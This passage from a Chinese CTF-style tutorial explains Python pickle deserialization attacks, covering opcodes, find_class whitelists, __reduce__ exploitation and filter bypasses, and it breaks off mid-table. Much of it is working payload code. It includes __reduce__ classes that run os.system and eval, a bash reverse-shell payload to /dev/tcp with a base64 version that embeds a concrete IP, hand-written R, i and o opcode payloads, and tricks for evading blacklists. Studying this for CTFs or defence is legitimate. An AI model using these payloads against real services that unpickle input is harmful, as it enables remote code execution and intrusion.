<p>pickle由于有不同的实现版本，在Py3和py2中得到的opcode不相同。但是pickle可以向下兼容（所以用v0就可以在所有版本中执行）。目前，pickle有6种版本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">a=&#123;<span class="string">&#x27;1&#x27;</span>: <span class="number">1</span>, <span class="string">&#x27;2&#x27;</span>: <span class="number">2</span>&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&#x27;# 原变量：<span class="subst">&#123;a!r&#125;</span>&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;pickle版本<span class="subst">&#123;i&#125;</span>&#x27;</span>,pickle.dumps(a,protocol=i))</span><br><span class="line"></span><br><span class="line">输出：</span><br><span class="line"></span><br><span class="line"><span class="comment"># 原变量：&#123;&#x27;1&#x27;: 1, &#x27;2&#x27;: 2&#125;</span></span><br><span class="line">pickle版本<span class="number">0</span> <span class="string">b&#x27;(dp0\nV1\np1\nI1\nsV2\np2\nI2\ns.&#x27;</span></span><br><span class="line">pickle版本<span class="number">1</span> <span class="string">b&#x27;&#125;q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.&#x27;</span></span><br><span class="line">pickle版本<span class="number">2</span> <span class="string">b&#x27;\x80\x02&#125;q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.&#x27;</span></span><br><span class="line">pickle版本<span class="number">3</span> <span class="string">b&#x27;\x80\x03&#125;q\x00(X\x01\x00\x00\x001q\x01K\x01X\x01\x00\x00\x002q\x02K\x02u.&#x27;</span></span><br></pre></td></tr></table></figure>

<p>pickle3版本的opcode示例：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># &#x27;abcd&#x27;</span></span><br><span class="line"><span class="string">b&#x27;\x80\x03X\x04\x00\x00\x00abcdq\x00.&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># \x80：协议头声明 \x03：协议版本</span></span><br><span class="line"><span class="comment"># \x04\x00\x00\x00：数据长度：4</span></span><br><span class="line"><span class="comment"># abcd：数据</span></span><br><span class="line"><span class="comment"># q：储存栈顶的字符串长度：一个字节（即\x00）</span></span><br><span class="line"><span class="comment"># \x00：栈顶位置</span></span><br><span class="line"><span class="comment"># .：数据截止</span></span><br></pre></td></tr></table></figure>

<h4 id="pickletools"><a href="#pickletools" class="headerlink" title="pickletools"></a>pickletools</h4><p>使用pickletools可以方便的将opcode转化为便于肉眼读取的形式</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"></span><br><span class="line">data=<span class="string">b&#x27;\x80\x04\x95\x1c\x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\x04ls /\x94\x85\x94R\x94.&#x27;</span></span><br><span class="line">pickletools.dis(data)</span><br><span class="line"></span><br><span class="line">   <span class="number">0</span>: \x80 PROTO      <span class="number">4</span></span><br><span class="line">    <span class="number">2</span>: \x95 FRAME      <span class="number">28</span></span><br><span class="line">   <span class="number">11</span>: \x8c SHORT_BINUNICODE <span class="string">&#x27;nt&#x27;</span></span><br><span class="line">   <span class="number">15</span>: \x94 MEMOIZE    (<span class="keyword">as</span> <span class="number">0</span>)</span><br><span class="line">   <span class="number">16</span>: \x8c SHORT_BINUNICODE <span class="string">&#x27;system&#x27;</span></span><br><span class="line">   <span class="number">24</span>: \x94 MEMOIZE    (<span class="keyword">as</span> <span class="number">1</span>)</span><br><span class="line">   <span class="number">25</span>: \x93 STACK_GLOBAL</span><br><span class="line">   <span class="number">26</span>: \x94 MEMOIZE    (<span class="keyword">as</span> <span class="number">2</span>)</span><br><span class="line">   <span class="number">27</span>: \x8c SHORT_BINUNICODE <span class="string">&#x27;ls /&#x27;</span></span><br><span class="line">   <span class="number">33</span>: \x94 MEMOIZE    (<span class="keyword">as</span> <span class="number">3</span>)</span><br><span class="line">   <span class="number">34</span>: \x85 TUPLE1</span><br><span class="line">   <span class="number">35</span>: \x94 MEMOIZE    (<span class="keyword">as</span> <span class="number">4</span>)</span><br><span class="line">   <span class="number">36</span>: R    REDUCE</span><br><span class="line">   <span class="number">37</span>: \x94 MEMOIZE    (<span class="keyword">as</span> <span class="number">5</span>)</span><br><span class="line">   <span class="number">38</span>: .    STOP</span><br><span class="line">highest protocol among opcodes = <span class="number">4</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="Unpickler-find-class-函数"><a href="#Unpickler-find-class-函数" class="headerlink" title="Unpickler.find_class()函数"></a><code>Unpickler.find_class()函数</code></h3><p>官方针对pickle的安全问题的建议是修改<code>find_class()</code>，引入白名单的方式来解决，很多CTF题都是针对该函数进行，所以搞清楚如何绕过该函数很重要。<br> <strong>什么时候会调用<code>find_class()</code>：</strong></p>
<ol>
<li>从opcode角度看，当出现<code>c</code>、<code>i</code>、<code>b&#39;\x93&#39;</code>时，会调用，所以只要在这三个opcode直接引入模块时没有违反规则即可。</li>
<li>从python代码来看，<code>find_class()</code>只会在解析opcode时调用一次，所以只要绕过opcode执行过程，<code>find_class()</code>就不会再调用，也就是说<code>find_class()</code>只需要过一次，通过之后再产生的函数在黑名单中也不会拦截，所以可以通过<code>__import__</code>绕过一些黑名单。</li>
</ol>
<p>看下面两个例子：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">safe_builtins = &#123;<span class="string">&#x27;range&#x27;</span>,<span class="string">&#x27;complex&#x27;</span>,<span class="string">&#x27;set&#x27;</span>,<span class="string">&#x27;frozenset&#x27;</span>,<span class="string">&#x27;slice&#x27;</span>,&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">RestrictedUnpickler</span>(pickle.Unpickler):</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">find_class</span>(<span class="params">self, module, name</span>):</span><br><span class="line">        <span class="comment"># Only allow safe classes from builtins.</span></span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">&quot;builtins&quot;</span> <span class="keyword">and</span> name <span class="keyword">in</span> safe_builtins:</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">getattr</span>(builtins, name)</span><br><span class="line">        <span class="comment"># Forbid everything else.</span></span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">&quot;global &#x27;%s.%s&#x27; is forbidden&quot;</span> %(module, name))</span><br></pre></td></tr></table></figure>



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">RestrictedUnpickler</span>(pickle.Unpickler):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">find_class</span>(<span class="params">self, module, name</span>):</span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">&#x27;__main__&#x27;</span>: <span class="comment"># 只允许__main__模块</span></span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">getattr</span>(sys.modules[<span class="string">&#x27;__main__&#x27;</span>], name)</span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">&quot;global &#x27;%s.%s&#x27; is forbidden&quot;</span> % (module, name))</span><br></pre></td></tr></table></figure>

<ul>
<li>第一个例子是官方文档中的例子，使用白名单限制了能够调用的模块为<code>&#123;&#39;range&#39;,&#39;complex&#39;,&#39;set&#39;,&#39;frozenset&#39;,&#39;slice&#39;,&#125;</code>。</li>
<li>第二个例子是高校战疫网络安全分享赛·webtmp中的过滤方法，只允许<code>__main__</code>模块。虽然看起来很安全，但是被引入主程序的模块都可以通过<code>__main__</code>调用修改，所以造成了变量覆盖。</li>
</ul>
<p>————————</p>
<h3 id="经典的-reduce-方法"><a href="#经典的-reduce-方法" class="headerlink" title="经典的__reduce__方法"></a><code>经典的__reduce__方法</code></h3><p>现在基本用不了，容易被ban。它的指令码是<code>R</code>。</p>
<ul>
<li>在利用时，可以通过重写类的<code>object.__reduce__()</code>函数，使之在被序列化时按照重写的方式进行。具体而言，python要求<code>object.__reduce__()</code> 返回一个 <code>(callable, ([para1,para2...])[,...])</code> 的元组，每当该类的对象被unpickle时，该callable就会被调用以生成对象（该callable其实是构造函数）。</li>
<li>在下文pickle的opcode中， <code>R</code> 的作用与 <code>object.__reduce__()</code> 关系密切：选择栈上的第一个对象作为函数、第二个对象作为参数（<strong>第二个对象必须为元组</strong>,否则其他返回值也无法利用），然后调用该函数。</li>
</ul>
<p>所以一种很流行的攻击思路是：利用<code>__reduce__</code>构造恶意字符串，当这个字符串被反序列化的时候，<code>__reduce__</code>会被执行。</p>
<p><u><strong>总结</strong>这里<code>__reduce__</code>魔术方法的作用</u>：</p>
<p>其实上面描述已经比较清楚了，<strong>在Python中<code>__reduce__</code>方法是一个特殊的方法，用于控制对象的序列化和反序列化过程。</strong><u>当一个对象被序列化时，<code>pickle</code>模块会调用该对象的<code>__reduce__</code>方法，以获取一个描述如何反序列化该对象的元组</u>，同时，<strong>当对象被反序列化时，<code>pickle</code>模块会调用该元组中的可调用对象，并将其余元素作为参数传递给改可调用对象</strong>。</p>
<p>所以当我传入的按照我设置的格式进行pickle序列化后生成的字符串，在被反序列化时，它将按照我定义的<code>__reduce__</code>方法来反序列化；因此，重写<code>__reduce__</code>方法可以让我们控制对象在反序列化时的行为，并在CTF环境中执行任意代码。</p>
<p>——————</p>
<h3 id="简单的exp"><a href="#简单的exp" class="headerlink" title="简单的exp"></a>简单的exp</h3><p>漏洞利用简略思路：</p>
<ul>
<li>任意代码执行或命令执行。</li>
<li>变量覆盖，通过覆盖一些凭证达到绕过身份验证的目的</li>
</ul>
<p><strong>注意</strong>：pickle序列化的结果可能与从操作系统有关，使用windows构建的payload可能不能在linux上运行。</p>
<h5 id="命令执行："><a href="#命令执行：" class="headerlink" title="命令执行："></a>命令执行：</h5><h6 id="当环境有os模块时"><a href="#当环境有os模块时" class="headerlink" title="当环境有os模块时"></a>当环境有os模块时</h6><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">genpoc</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        s = <span class="string">&quot;&quot;&quot;ls /&quot;&quot;&quot;</span>  <span class="comment"># 要执行的命令</span></span><br><span class="line">        <span class="keyword">return</span> os.system, (s,)        <span class="comment"># reduce函数必须返回元组或字符串</span></span><br><span class="line">        <span class="comment">#或者直接return os.system,(&quot;ls /&quot;,)</span></span><br><span class="line"></span><br><span class="line">e = genpoc()</span><br><span class="line">poc = pickle.dumps(e)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(poc) <span class="comment"># 此时，如果 pickle.loads(poc)，就会执行命令</span></span><br></pre></td></tr></table></figure>

<p>成功执行：</p>
<p><img src="/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/image-20240509003635408.png" alt="image-20240509003635408"></p>
<p><strong>稍微解析一下这串代码：</strong></p>
<ol>
<li>导入pickle、os模块</li>
<li>定义了一个继承自object类的genpoc类。<strong>这是python中的常见做法，以确保类的行为符合预期</strong></li>
<li>在<code>genpoc</code>类内部，你重写了<code>__reduce__</code>方法。<strong>这个方法由<code>pickle</code>模块用来确定如何序列化和反序列化一个对象。</strong></li>
<li>在<code>__reduce__</code>方法内部，你定义了一个命令<code>echo test &gt; poc.txt</code>。当执行这个命令时，它会创建一个名为<code>poc.txt</code>的文件，内容为<code>test</code>。</li>
<li>从<code>__reduce__</code>方法<strong>返回了一个元组<code>(os.system,(s,))</code>。</strong><u>这告诉pickle模块在解Pickle对象时调用<code>os.system</code>和命令<code>s</code></u>。这种特定格式的原因是**<code>__reduce__</code>方法必须返回一个元组或字符串**（由于元组才有用所以基本都是利用元组）。元组的第一个元素是一个可调用的对象（在这种情况下时<code>os.system</code>），其余元素是该可调用对象的参数。</li>
<li>最后创建了一个<code>genpoc</code>类的实例<code>e</code>，然后使用<code>pickle.dumps(e)</code>对其进行了pickle。这创建了一个对象的序列化表示，可以稍后解pickle以执行命令</li>
</ol>
<p><strong>其他个人困惑解析：</strong></p>
<p><u>1.为什么这里的参数为<code>(s,)</code>这种格式，其中的逗号起什么作用</u>：</p>
<p>解析：在python中，元组是一种不可变的序列类型，用于存储一系列项目。<strong>元组中的项目用逗号分隔，并且整个元组被括号包围</strong>，在这个脚本中，<code>(s,)</code>是一个只包含一个元素的元组。逗号在这里起着非常重要的作用，<strong>因为它是区分元组和单个表达式的关键</strong>。</p>
<p>如果只写<code>(s)</code>，python会将其识别为一个单独的表达式，而不是包含一个元素的元组。因此，在这个脚本中，<code>(s,)</code>是一个包含一个元素的元组，该元素是要执行的命令。当<code>os.system</code>被调用时，它会将这个元组作为参数，从而执行命令。</p>
<h6 id="当环境没有os模块（常用）"><a href="#当环境没有os模块（常用）" class="headerlink" title="当环境没有os模块（常用）"></a>当环境没有os模块（常用）</h6><p>就需要生成一个让环境执行引入os模块的指令：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">haha</span>():</span><br><span class="line">	<span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">		<span class="keyword">return</span> (<span class="built_in">eval</span>,(<span class="string">&#x27;&#x27;&#x27;__import__(&quot;os&quot;).popen(&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/xxxxx/2333 0&gt;&amp;1&#x27;&quot;).read()&#x27;&#x27;&#x27;</span>,))</span><br><span class="line"><span class="comment">#&#x27;&#x27;&#x27;改为&quot;也行具体个人用，不是固定的</span></span><br><span class="line">a = haha()</span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(pickle.dumps(a))</span><br><span class="line"><span class="comment"># b&#x27;gASVcgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIxWX19pbXBvcnRfXygib3MiKS5wb3BlbigiYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTAuNDEuMTcuMTgzLzIzMzMgMD4mMSciKS5yZWFkKCmUhZRSlC4=&#x27;</span></span><br></pre></td></tr></table></figure>

<p>最好所有的poc在Linux上生成</p>
<h5 id="变量覆盖："><a href="#变量覆盖：" class="headerlink" title="变量覆盖："></a>变量覆盖：</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"></span><br><span class="line">a = <span class="string">b&#x27;321&#x27;</span></span><br><span class="line">c = <span class="string">b&#x27;123&#x27;</span></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">A</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (<span class="built_in">exec</span>,(<span class="string">&quot;key1=b&#x27;1&#x27;\nkey2=b&#x27;2&#x27;&quot;</span>,))</span><br><span class="line"></span><br><span class="line">a = A()</span><br><span class="line">pickle_a = pickle.dumps(a)</span><br><span class="line"><span class="built_in">print</span>(pickle_a)</span><br><span class="line">pickle.loads(pickle_a)</span><br><span class="line"><span class="built_in">print</span>(key1, key2)</span><br></pre></td></tr></table></figure>

<p>上面的两个方法使用的<code>__reduce__方法</code>其实就是对应的opcode中的R指令。</p>
<h3 id="绕过手法"><a href="#绕过手法" class="headerlink" title="绕过手法"></a>绕过手法</h3><h4 id="简单的利用以及绕过"><a href="#简单的利用以及绕过" class="headerlink" title="简单的利用以及绕过"></a>简单的利用以及绕过</h4><h6 id="函数过滤"><a href="#函数过滤" class="headerlink" title="函数过滤"></a>函数过滤</h6><p>有一种过滤方式：不禁止<code>R</code>指令码，但是对<code>R</code>执行的函数有黑名单限制</p>
<p>比如2018-XCTF-HITB-WEB : Python’s-Revenge。给了很长一串黑名单：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">black_type_list = [<span class="built_in">eval</span>, execfile, <span class="built_in">compile</span>, <span class="built_in">open</span>, file, os.system, os.popen, os.popen2, os.popen3, os.popen4, os.fdopen, os.tmpfile, os.fchmod, os.fchown, os.<span class="built_in">open</span>, os.openpty, os.read, os.pipe, os.chdir, os.fchdir, os.chroot, os.chmod, os.chown, os.link, os.lchown, os.listdir, os.lstat, os.mkfifo, os.mknod, os.access, os.mkdir, os.makedirs, os.readlink, os.remove, os.removedirs, os.rename, os.renames, os.rmdir, os.tempnam, os.tmpnam, os.unlink, os.walk, os.execl, os.execle, os.execlp, os.execv, os.execve, os.dup, os.dup2, os.execvp, os.execvpe, os.fork, os.forkpty, os.kill, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe, os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, pickle.load, pickle.loads, cPickle.load, cPickle.loads, subprocess.call, subprocess.check_call, subprocess.check_output, subprocess.Popen, commands.getstatusoutput, commands.getoutput, commands.getstatus, glob.glob, linecache.getline, shutil.copyfileobj, shutil.copyfile, shutil.copy, shutil.copy2, shutil.move, shutil.make_archive, dircache.listdir, dircache.opendir, io.<span class="built_in">open</span>, popen2.popen2, popen2.popen3, popen2.popen4, timeit.timeit, timeit.repeat, sys.call_tracing, code.interact, code.compile_command, codeop.compile_command, pty.spawn, posixfile.<span class="built_in">open</span>, posixfile.fileopen]</span><br></pre></td></tr></table></figure>

<p> 但是这里**platform.popen()**不在名单里，它可以做到类似<code>system</code>的功能（想要利用应该还是需要<code>import platform</code>）。</p>
<p>另外，还有可以<strong>利用map()函数</strong>来干这件事：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Exploit</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line"> 	<span class="keyword">return</span> <span class="built_in">map</span>,(os.system,[<span class="string">&quot;ls&quot;</span>])</span><br></pre></td></tr></table></figure>

<p> 总之，黑名单不可取，如果禁止掉<code>R</code>这个指令码，那么reduce这一套方法都不能再使用。</p>
<h6 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h6><p>与命令执行相关的opcode有三个：<code>R</code>、<code>i</code>、<code>o</code>，所以我们可以从三个方向进行构造。（测试了一下，下面的几种指令都能用），还可以使用<code>b</code>，看后面的稍难过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">R可用</span><br><span class="line"></span><br><span class="line">b&#x27;&#x27;&#x27;cos</span><br><span class="line">system</span><br><span class="line">(S&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&quot;&#x27;</span><br><span class="line">tR.&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">i可用  ==》INST</span><br><span class="line"></span><br><span class="line">b&#x27;&#x27;&#x27;(S&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&quot;&#x27;</span><br><span class="line">ios</span><br><span class="line">system</span><br><span class="line">.&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">o可用  ==》OBJ</span><br><span class="line"></span><br><span class="line">b&#x27;&#x27;&#x27;(cos</span><br><span class="line">system</span><br><span class="line">S&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1&quot;&#x27;</span><br><span class="line">o.&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line">特殊情况</span><br><span class="line">无R,i,o,但是os可用</span><br><span class="line">b&#x27;&#x27;&#x27;(cos\nsystem\nS&#x27;calc&#x27;\nos.&#x27;&#x27;&#x27;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">无R,i,o os  可过关键词过滤（还是比较重要）</span><br><span class="line">b&#x27;&#x27;&#x27;(S&#x27;key1&#x27;\nS&#x27;val1&#x27;\ndS&#x27;vul&#x27;\n(cos\nsystem\nVcalc\nos.&#x27;&#x27;&#x27;</span><br><span class="line">V操作码是可以识别\u ，所以如果过滤了关键字还可以将命令unicode编码也能识别。</span><br></pre></td></tr></table></figure>

<p>注意：如果想拼接的payload就使用\n代表换行，这样才方便生成payload，但是需要注意的就是如果用赛博厨子 会将 \n 当作字符处理，易出错</p>
<p><strong>利用方式：</strong></p>
<p>最好如下在s那里加上encode()，这样才不会因为base64函数问题报str的错</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">s = <span class="string">b&#x27;&#x27;&#x27;cos</span></span><br><span class="line"><span class="string">system</span></span><br><span class="line"><span class="string">(S&#x27;whoami&#x27;</span></span><br><span class="line"><span class="string">tR.&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(base64.b64encode(s.encode()))</span><br></pre></td></tr></table></figure>

<h6 id="绕过显示字符串检测-关键字绕过"><a href="#绕过显示字符串检测-关键字绕过" class="headerlink" title="绕过显示字符串检测-关键字绕过"></a>绕过显示字符串检测-关键字绕过</h6><p><code>V</code>操作符可以进行unicode编码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Vsecr\u0065t</span><br><span class="line"><span class="comment">#secret</span></span><br></pre></td></tr></table></figure>

<p><code>S</code>操作符可以识别十六进制：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">S<span class="string">&#x27;\x73ecret&#x27;</span></span><br><span class="line"><span class="comment">#secret</span></span><br></pre></td></tr></table></figure>

<p>等比如过滤os关键字等小绕过可以小部分参考ssti的绕过手法</p>
<p><strong>注意：</strong>其实上述的R指令在现在已经很难生效了，通常都会对指令码进行过滤，需要结合对整个过程的理解来绕过。R被过滤情况下可以尝试其他几种过滤。（但是个人理解，都有一个缺点：<strong>只能执行单一的函数，很难构造复杂的操作</strong>）</p>
<h4 id="稍进阶绕过"><a href="#稍进阶绕过" class="headerlink" title="稍进阶绕过"></a>稍进阶绕过</h4><p>建议看：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7012?time__1311=n4+xnD0GDti=d0Ic405+bDyi8Q0Q1OzDRmoD&alichlgref=https://xz.aliyun.com/t/7436?time__1311=n4%252BxnD0G0%253Dit0Q6qGNnmjt%253DDtNi%253DzdD9jDYwD&alichlgref=https%253A%252F%252Fwww.bing.com%252F#toc-0">文章1</a>与<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436?time__1311=n4+xnD0G0=it0Q6qGNnmjt=DtNi=zdD9jDYwD&alichlgref=https://www.bing.com/#toc-10">文章2</a>，并且有docker可以复现。</p>
<h5 id="如何手写opcode"><a href="#如何手写opcode" class="headerlink" title="如何手写opcode"></a>如何手写opcode</h5><p>如何手搓<a target="_blank" rel="noopener" href="https://ucasers.cn/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%B8%8E%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/#title-5">参考文章</a></p>
<ul>
<li>在CTF中，很<strong>多时候需要一次执行多个函数或一次进行多个指令</strong>，此时就不能光用<code>__reduce__</code>来解决问题（reduce一次只能执行一个函数，当exec等函数被禁用时，就不能一次执行多条指令了），而需要手动拼接或构造opcode了。</li>
<li>在这里可以体会到为何pickle<strong>是一种语言</strong>，直接编写的opcode灵活性比使用pickle序列化生成的代码更高，只要符合pickle语法，就可以进行变量覆盖、函数执行等操作。</li>
<li>根据前文不同版本的opcode可以看出，版本0的opcode更方便阅读，所以手动编写时，一般选用版本0的opcode。<strong>下文中，所有opcode为版本0的opcode</strong>。</li>
</ul>
<p>常用的opcode如下（还可以在<code>python31\Lib\pickle.py</code>里看到）：</p>
<table>
<thead>
<tr>
<th>opcode</th>
<th>描述</th>
<th>具体写法</th>
<th>栈上的变化</th>
<th>memo上的变化</th>
</tr>
</thead>
<tbody><tr>
<td>c</td>
<td>获取一个全局对象或import一个模块（注：会调用import语句，能够引入新的包）</td>
<td>c[module]\n[instance]\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>o</td>
<td>寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）</td>
<td>o</td>
<td>这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈</td>
<td>无</td>
</tr>
<tr>
<td>i</td>
<td>相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）</td>
<td>i[module]\n[callable]\n</td>
<td>这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈</td>
<td>无</td>
</tr>
<tr>
<td>N</td>
<td>实例化一个None</td>
<td>N</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>S</td>
<td>实例化一个字符串对象</td>
<td>S’xxx’\n（也可以使用双引号、&#39;等python字符串形式）</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>V</td>
<td>实例化一个UNICODE字符串对象</td>
<td>Vxxx\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>I</td>
<td>实例化一个int对象</td>
<td>Ixxx\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>F</td>
<td>实例化一个float对象</td>
<td>Fx.x\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>R</td>
